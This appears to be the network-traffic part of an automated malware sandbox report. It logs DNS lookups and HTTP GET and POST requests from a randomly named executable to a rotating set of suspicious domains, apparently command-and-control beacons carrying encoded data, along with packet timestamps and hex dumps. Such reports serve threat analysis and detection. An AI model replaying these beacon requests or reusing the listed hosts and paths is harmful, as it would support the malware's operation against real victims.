                                                      Dec 3, 2024 06:56:34.926516056 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.926558018 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:34.931509018 CET8050034203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:34.931560040 CET5003480192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:35.924083948 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:36.044068098 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.044481993 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:36.057744980 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:36.177846909 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.177966118 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.177974939 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.178124905 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.178181887 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.178261995 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.178271055 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.178447962 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:36.178456068 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436388016 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436407089 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436418056 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436438084 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436450005 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436460018 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436570883 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:37.436570883 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:37.436614037 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436659098 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436671019 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436681986 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.436712027 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:37.436724901 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:37.556988001 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.557004929 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.557060003 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:37.560955048 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.561837912 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:37.644923925 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.644979000 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.645014048 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:37.645050049 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:37.647561073 CET8050038203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:37.647609949 CET5003880192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:38.861757040 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:38.982001066 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:38.982085943 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:38.989727974 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:39.109966993 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.307801008 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.307821035 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.307831049 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.307949066 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:40.307985067 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.308043957 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.308054924 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.308063984 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.308073044 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.308089018 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:40.308120012 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:40.308398962 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.308408976 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.308459997 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:40.428014994 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.428205013 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.428250074 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:40.432214022 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.483588934 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:40.518773079 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.519011021 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.519057989 CET5003980192.168.2.4203.161.42.73
                                                      Dec 3, 2024 06:56:40.521457911 CET8050039203.161.42.73192.168.2.4
                                                      Dec 3, 2024 06:56:40.521505117 CET5003980192.168.2.4203.161.42.73

                                                      UDP Packets

                                                      TimestampSource PortDest PortSource IPDest IP
                                                      Dec 3, 2024 06:54:07.640765905 CET5998553192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:54:07.966757059 CET53599851.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:54:24.425208092 CET5192053192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:54:25.237344027 CET53519201.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:54:39.908658981 CET6465153192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:54:40.920866013 CET6465153192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:54:41.049278975 CET53646511.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:54:41.059231043 CET53646511.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:54:55.378140926 CET6343253192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:54:55.871191978 CET53634321.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:55:10.236394882 CET5926253192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:55:11.249140024 CET5926253192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:55:11.597353935 CET53592621.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:55:11.597366095 CET53592621.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:55:29.402302027 CET5984653192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:55:30.006187916 CET53598461.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:55:44.518559933 CET5181053192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:55:45.237375021 CET53518101.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:55:59.674165964 CET5488753192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:56:00.055869102 CET53548871.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:56:15.233599901 CET6328753192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:56:15.723472118 CET53632871.1.1.1192.168.2.4
                                                      Dec 3, 2024 06:56:30.174877882 CET5275753192.168.2.41.1.1.1
                                                      Dec 3, 2024 06:56:30.602577925 CET53527571.1.1.1192.168.2.4

                                                      DNS Queries

                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                      Dec 3, 2024 06:54:07.640765905 CET192.168.2.41.1.1.10x7b82Standard query (0)www.izmirescortg.xyzA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:24.425208092 CET192.168.2.41.1.1.10xab05Standard query (0)www.aballanet.catA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:39.908658981 CET192.168.2.41.1.1.10x45afStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:40.920866013 CET192.168.2.41.1.1.10x45afStandard query (0)www.madhf.techA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:55.378140926 CET192.168.2.41.1.1.10xbd5bStandard query (0)www.canadavinreport.siteA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:10.236394882 CET192.168.2.41.1.1.10x9c21Standard query (0)www.yunlekeji.topA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:11.249140024 CET192.168.2.41.1.1.10x9c21Standard query (0)www.yunlekeji.topA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:29.402302027 CET192.168.2.41.1.1.10x8b07Standard query (0)www.logidant.xyzA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:44.518559933 CET192.168.2.41.1.1.10xd0e4Standard query (0)www.laohub10.netA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:59.674165964 CET192.168.2.41.1.1.10x21feStandard query (0)www.zkdamdjj.shopA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:56:15.233599901 CET192.168.2.41.1.1.10x367bStandard query (0)www.tals.xyzA (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:56:30.174877882 CET192.168.2.41.1.1.10x4a62Standard query (0)www.brightvision.websiteA (IP address)IN (0x0001)false

                                                      DNS Answers

                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                      Dec 3, 2024 06:54:07.966757059 CET1.1.1.1192.168.2.40x7b82No error (0)www.izmirescortg.xyz104.21.36.62A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:07.966757059 CET1.1.1.1192.168.2.40x7b82No error (0)www.izmirescortg.xyz172.67.186.192A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:25.237344027 CET1.1.1.1192.168.2.40xab05No error (0)www.aballanet.cataballanet.catCNAME (Canonical name)IN (0x0001)false
                                                      Dec 3, 2024 06:54:25.237344027 CET1.1.1.1192.168.2.40xab05No error (0)aballanet.cat134.0.14.158A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:41.049278975 CET1.1.1.1192.168.2.40x45afNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:41.059231043 CET1.1.1.1192.168.2.40x45afNo error (0)www.madhf.tech103.224.182.242A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:54:55.871191978 CET1.1.1.1192.168.2.40xbd5bNo error (0)www.canadavinreport.site185.27.134.206A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:11.597353935 CET1.1.1.1192.168.2.40x9c21No error (0)www.yunlekeji.top106.15.109.33A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:11.597366095 CET1.1.1.1192.168.2.40x9c21No error (0)www.yunlekeji.top106.15.109.33A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:30.006187916 CET1.1.1.1192.168.2.40x8b07No error (0)www.logidant.xyzlogidant.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Dec 3, 2024 06:55:30.006187916 CET1.1.1.1192.168.2.40x8b07No error (0)logidant.xyz45.141.156.114A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:45.237375021 CET1.1.1.1192.168.2.40xd0e4No error (0)www.laohub10.netr0lqcud7.nbnnn.xyzCNAME (Canonical name)IN (0x0001)false
                                                      Dec 3, 2024 06:55:45.237375021 CET1.1.1.1192.168.2.40xd0e4No error (0)r0lqcud7.nbnnn.xyz23.225.159.42A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:45.237375021 CET1.1.1.1192.168.2.40xd0e4No error (0)r0lqcud7.nbnnn.xyz23.225.160.132A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:45.237375021 CET1.1.1.1192.168.2.40xd0e4No error (0)r0lqcud7.nbnnn.xyz27.124.4.246A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:55:45.237375021 CET1.1.1.1192.168.2.40xd0e4No error (0)r0lqcud7.nbnnn.xyz202.79.161.151A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:56:00.055869102 CET1.1.1.1192.168.2.40x21feNo error (0)www.zkdamdjj.shop172.67.187.114A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:56:00.055869102 CET1.1.1.1192.168.2.40x21feNo error (0)www.zkdamdjj.shop104.21.40.167A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:56:15.723472118 CET1.1.1.1192.168.2.40x367bNo error (0)www.tals.xyz13.248.169.48A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:56:15.723472118 CET1.1.1.1192.168.2.40x367bNo error (0)www.tals.xyz76.223.54.146A (IP address)IN (0x0001)false
                                                      Dec 3, 2024 06:56:30.602577925 CET1.1.1.1192.168.2.40x4a62No error (0)www.brightvision.website203.161.42.73A (IP address)IN (0x0001)false

                                                      HTTP Request Dependency Graph

                                                      • www.izmirescortg.xyz
                                                      • www.aballanet.cat
                                                      • www.madhf.tech
                                                      • www.canadavinreport.site
                                                      • www.yunlekeji.top
                                                      • www.logidant.xyz
                                                      • www.laohub10.net
                                                      • www.zkdamdjj.shop
                                                      • www.tals.xyz
                                                      • www.brightvision.website

                                                      HTTP Packets

                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      0192.168.2.449736104.21.36.6280792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:08.102482080 CET367OUTGET /lnl7/?rfJh=kAPJ1zL1a1XedmcoetGOcXX+BQ0sya6JbBGKYGigv+9peDDnEk+ogR7nF5sJltA40tggf7QxXQcZwaMcwHfgZSqhyZMy+6OBPTB2cT6zQPdPsX8z060ybXY=&O258-=pHdHBdXhwLO HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Connection: close
                                                      Host: www.izmirescortg.xyz
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Dec 3, 2024 06:54:09.374830961 CET1128INHTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:54:09 GMT
                                                      Content-Type: text/html; charset=iso-8859-1
                                                      Transfer-Encoding: chunked
                                                      Connection: close
                                                      CF-Cache-Status: DYNAMIC
                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Gg9CNp9BliKKfIzIleuGRo2sgboe1DjNSITzUh%2BvaLmdbEwkg6NlbPctPgy1vZ8G09NQKQ6E2%2F%2B%2B7qkfrAxKu4YK74mchpcIUWlwP6dOCjjiUqM8XdEo2YHCqwr2Kl3xTksM0Jh3cw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                      Server: cloudflare
                                                      CF-RAY: 8ec14ce66f67431a-EWR
                                                      alt-svc: h3=":443"; ma=86400
                                                      server-timing: cfL4;desc="?proto=TCP&rtt=2685&min_rtt=2685&rtt_var=1342&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=367&delivery_rate=0&cwnd=222&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                      Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                      Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>0


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                      1192.168.2.449737134.0.14.15880792C:\Program Files (x86)\iZMwudrqluVdhOfVWoIIYBXsPQEMHkRPgAAMdHYaAg\zZyhwwvEVl.exe
                                                      TimestampBytes transferredDirectionData
                                                      Dec 3, 2024 06:54:25.381787062 CET629OUTPOST /6xrr/ HTTP/1.1
                                                      Accept: */*
                                                      Accept-Language: en-US
                                                      Accept-Encoding: gzip, deflate, br
                                                      Content-Length: 201
                                                      Connection: close
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Cache-Control: max-age=0
                                                      Host: www.aballanet.cat
                                                      Origin: http://www.aballanet.cat
                                                      Referer: http://www.aballanet.cat/6xrr/
                                                      User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                      Data Raw: 72 66 4a 68 3d 4b 7a 68 67 58 51 68 42 2f 49 47 6c 34 6c 45 42 70 41 51 43 7a 4d 39 54 61 38 62 70 39 76 31 41 32 58 50 77 33 38 6e 73 4f 45 64 35 44 34 44 63 63 41 54 62 45 6d 53 62 4b 45 6e 72 45 32 49 4e 39 36 43 68 55 58 49 4f 41 62 51 74 47 71 46 46 61 75 65 52 65 4c 36 70 34 52 6f 57 6a 4a 5a 35 39 34 58 70 33 4c 2f 41 2f 32 70 37 39 4d 34 2f 54 5a 6f 50 64 7a 6c 43 57 76 71 37 6a 59 2f 41 36 76 70 31 4b 59 5a 56 36 67 4d 52 69 67 6a 5a 50 48 43 4d 61 30 52 72 76 39 2b 68 6d 5a 4d 52 34 43 58 30 62 58 4b 50 4f 51 69 4f 76 45 2f 2b 63 7a 65 52 43 44 6b 78 67 45 41 73 51 41 36 75 68 41 3d 3d
                                                      Data Ascii: rfJh=KzhgXQhB/IGl4lEBpAQCzM9Ta8bp9v1A2XPw38nsOEd5D4DccATbEmSbKEnrE2IN96ChUXIOAbQtGqFFaueReL6p4RoWjJZ594Xp3L/A/2p79M4/TZoPdzlCWvq7jY/A6vp1KYZV6gMRigjZPHCMa0Rrv9+hmZMR4CX0bXKPOQiOvE/+czeRCDkxgEAsQA6uhA==
                                                      Dec 3, 2024 06:54:26.921345949 CET1236INHTTP/1.1 404 Not Found
                                                      Date: Tue, 03 Dec 2024 05:54:26 GMT
                                                      Server: Apache
                                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                                      Link: <https://aballanet.cat/wp-json/>; rel="https://api.w.org/"
                                                      Upgrade: h2,h2c
                                                      Connection: Upgrade, close
                                                      Transfer-Encoding: chunked
                                                      Content-Type: text/html; charset=UTF-8
                                                      Data Raw: 31 34 62 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 63 61 22 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 c3 a0 67 69 6e 61 20 6e 6f 20 74 72 6f 62 61 64 61 20 2d 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 20 63 6f 6e 74 65 6e 74 3d 22 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 41 72 71 75 69 74 65 63 74 6f 20 44 6f 63 74 6f 72 20 55 50 43 2c 20 74 72 61 79 65 63 74 6f 72 69 61 2c 20 74 65 73 69 73 20 64 65 20 65 73 74 75 64 69 6f 2c 20 70 75 62 6c 69 63 61 63 69 6f 6e 65 73 20 64 65 20 41 6c 62 65 72 74 20 41 62 61 6c 6c 61 6e 65 74 2c 20 4c 61 20 63 61 73 61 20 61 20 63 75 61 74 72 6f 20 76 69 65 6e 74 6f 73 20 65 6e 20 6c 61 20 [TRUNCATED]
                                                      Data Ascii: 14bd<!doctype html><html lang="ca" class="no-js"> <head> <meta charset="UTF-8"> <title>Pgina no trobada - Albert Aballanet</title> <meta name="keywords" content="Albert Aballanet, Arquitecto Doctor UPC, trayectoria, tesis de estudio, publicaciones de Albert Aballanet, La casa a cuatro vientos en la Bonanova"> <link href="//www.google-analytics.com" rel="dns-prefetch"> <link href="http://aballanet.cat/wp-content/themes/rwd-theme/img/icons/touch.png" rel="apple-touch-icon-precomposed"> <link rel="alternate" type="application/rss+xml" title="Albert Aballanet" href="https://aballanet.cat/feed/" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <meta name="description" content="Arquitecte Doctor UP
                                                      Dec 3, 2024 06:54:26.921365023 CET1236INData Raw: 43 22 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6e 6f 69 6e 64 65 78 2c 20 66 6f 6c 6c 6f 77 27 20 2f 3e 0a 09 3c 73 74 79 6c 65 3e 69 6d 67 3a 69 73 28 5b 73 69
                                                      Data Ascii: C"> <meta name='robots' content='noindex, follow' /><style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style>... This site is optimized with the Yoast SEO plugin v23.1 - https://yoa
                                                      Dec 3, 2024 06:54:26.921381950 CET1236INData Raw: 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d 6f 6a 69 5c 2f 31 35 2e 30 2e 33 5c 2f 37 32 78 37 32 5c 2f 22 2c 22 65 78 74 22 3a 22 2e 70 6e 67 22 2c 22 73 76 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77
                                                      Data Ascii: .w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/aballanet.cat\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.1"}};
                                                      Dec 3, 2024 06:54:26.921511889 CET1236INData Raw: 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 3d 22 75 6e 64 65 66 69 6e
                                                      Data Ascii: u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!
                                                      Dec 3, 2024 06:54:26.921608925 CET724INData Raw: 77 70 54 65 73 74 45 6d 6f 6a 69 53 75 70 70 6f 72 74 73 22 7d 29 3b 72 65 74 75 72 6e 20 76 6f 69 64 28 61 2e 6f 6e 6d 65 73 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65
                                                      Data Ascii: wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t
                                                      Dec 3, 2024 06:54:26.921627998 CET1236INData Raw: 32 30 30 30 0d 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67
                                                      Data Ascii: 2000<style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0
                                                      Dec 3, 2024 06:54:26.921641111 CET1236INData Raw: 31 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 77 70 2d 65 64 69 74 6f 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 61 62 61 6c 6c 61 6e 65 74
                                                      Data Ascii: 1' media='all' /><link rel='stylesheet' id='wp-editor-css' href='http://aballanet.cat/wp-includes/css/dist/editor/style.min.css?ver=6.7.1' media='all' /><link rel='stylesheet' id='algori_pdf_viewer-cgb-style-css-css' href='http://aballanet.c
                                                      Dec 3, 2024 06:54:26.921653032 CET1236INData Raw: 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 3a 20 23 66 66 36 39 30 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 61 6d 62 65 72 3a 20 23 66 63 62 39 30 30 3b 2d 2d 77
                                                      Data Ascii: inous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivi
                                                      Dec 3, 2024 06:54:26.921664953 CET1236INData Raw: 30 2c 32 34 30 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 62 6c 75 73 68 2d 62 6f 72 64 65 61 75 78 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 35
                                                      Data Ascii: 0,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65
                                                      Dec 3, 2024 06:54:26.922028065 CET1236INData Raw: 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 63 72 69 73 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 31 29 3b 7d 3a 77 68 65
                                                      Data Ascii: x rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-


                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
